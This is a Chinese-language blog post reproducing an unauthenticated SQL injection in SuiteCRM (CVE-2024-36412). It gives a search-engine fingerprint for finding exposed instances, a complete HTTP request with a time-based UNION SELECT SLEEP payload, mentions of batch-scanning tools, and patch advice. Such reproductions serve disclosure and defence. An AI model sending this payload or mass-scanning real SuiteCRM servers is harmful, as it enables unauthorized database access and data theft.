首页 > 数据库 >【漏洞复现】SuiteCRM SQL注入漏洞(CVE-2024-36412)

【漏洞复现】SuiteCRM SQL注入漏洞(CVE-2024-36412)

时间:2024-07-18 11:27:46浏览次数:18  
标签:SuiteCRM 2024 漏洞 复现 SQL POC 注入

0x01 产品简介

SuiteCRM是一款屡获殊荣的企业级开源客户关系管理系统,它具有强大的功能和高度的可定制性,且完全免费。

0x02 漏洞概述

SuiteCRM存在SQL注入漏洞,未经身份验证的远程攻击者可以通过该漏洞拼接执行SQL注入语句,从而获取数据库敏感信息。

0x03 搜索引擎

title="SuiteCRM"

在这里插入图片描述

0x04 漏洞复现

GET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

1、关闭互联网暴露面或接口设置访问权限

2、目前官方已发布漏洞修复版本,建议用户升级到安全版本
https://suitecrm.com/

标签:SuiteCRM,2024,漏洞,复现,SQL,POC,注入
From: https://blog.csdn.net/m0_60571842/article/details/140518137

相关文章

  • 【2024版】超详细Python+Pycharm安装保姆级教程,Python+Pycharm环境配置和使用指南,看完
    目录一、Python开发环境配置1.Python下载与安装二、PyCharm安装+运行测试+汉化1.PyCharm下载及安装2.解释器配置及项目测试3.PyCharm汉化本文将从Python解释器安装到Pycharm专业版安装和配置汉化等使用都进行了详细介绍,希望能够帮助到大家。Python解释器&Pycharm安......
  • 2024牛客多校第一场
    A简单的组合数学。考虑枚举为1的个数的长度为x,则其他数除了最后一位的0外都可以乱填。对于末尾为1的数,显然每一位都是独立的,单独考虑每一位。显然只要该位上有一个0即可,经典容斥:减去全为1的这一种情况。#include<bits/stdc++.h>usingnamespacestd;#defineintlonglong......
  • 2024 暑假集训杂题选做
    目录写在前面CF1981DCF1992F写在最后写在前面我是飞物。CF1981D2400妈的好诡异的题场上拿到这题我都不知道我要干啥呃呃考虑到每个合数均为若干质数的乘积,则若构造方案中有合数,可以将合数替换为质数从而减少使用的权值的种类数,于是仅需考虑使用质数构造,则此时并不需要考虑具......
  • 2024PHP在线客服系统源码+完全开源 带详细搭建教程
    本文是一个在线客服聊天系统源码。这是一款2024最新版本的PHP客服源码。基于ThinkPHP8.0+workerman,整体架构新颖全新UI,PHP客服端以及界面等即时通讯websocket服务端需要命令行执行。源码下载在下面链接中,下载zip压缩包https://gitee.com/source-code-home/php-customer-se......
  • 2024-07-18 浅尝rollup-plugin-visualizer——文件打包分析体积大小
    前言:vite+vue项目rollup-plugin-visualizer:一个用于Rollup构建系统的插件,它能够生成可视化的报告,展示你的项目构建后的模块依赖关系和文件大小。仓库:https://github.com/btd/rollup-plugin-visualizer安装:yarnaddrollup-plugin-visualizer配置(vite.config.ts):import{......
  • Java开发新趋势!MyEclipse v2024.1全新首发——支持AI编码协助
    在MyEclipse 2024中,通过Copilot集成提供的AI编码协助,让开发者的生产力提高了近10倍;同时支持Java22,并部署到最新版本的应用服务器(如WildFly和Payara);拥有更高性能的Spring工具支持更流畅的编码体验,而语言服务器更新确保对所有现代web技术的最新语言支持。MyEclipse的现有用户可......
  • 2024-07-18 闲话 两周年后的某一天
    soytony在群里问啥时候有yspm闲话两周年,我想说让APJ用Day1分数和我交换这篇闲话,但是这种行为也太过于没有素质了,于是我先写一波,当成他考完Day1能看到的依托答辩吧。昨天晚上回家了,所以主题可以是回家?幼儿园小学初中每天上完学就回家,在家里也就是吃饭,睡觉,有时候写作业,家......
  • 河南萌新联赛2024第(一)场:河南农业大学
    1.D-小蓝的二进制询问原题链接:https://ac.nowcoder.com/acm/contest/86639/D我们列举一些二进制数,发现在第一位永远是01的循环,第二位是0011的循环。。。第n位也是如此,所以可以得出每位上的循环节是2k,且前一半的数都是0。每次在计算某数时的1的总个数可以计算他是循环节的......
  • 20240718二分图
    一.基础概念1.定义:如果一个图的所有顶点可以被分成两个集合U和V,使得每条边连接的两个顶点都分别属于两个不同的集合,那么这个图就是一个二分图(BipartiteGraph)。2.性质:每个偶环都是二分图如果一个二分图中存在奇环,则它不是二分图。二.霍尔定理前言:在hloj上有这个内容,不知......
  • 河南萌新联赛2024第(一)场 补题报告
    小蓝的二进制询问找规律,可以发现把从0开始的十进制数字转化为二进制。每一个二进制位有0或1两种状态。从低到高的第一位以2为周期,第二位以4为周期,第三位以8为周期……也就是说第n位以2^{n}为周期。每个周期都是前一半是0,后一半是1。举例:000001010011100……#inclu......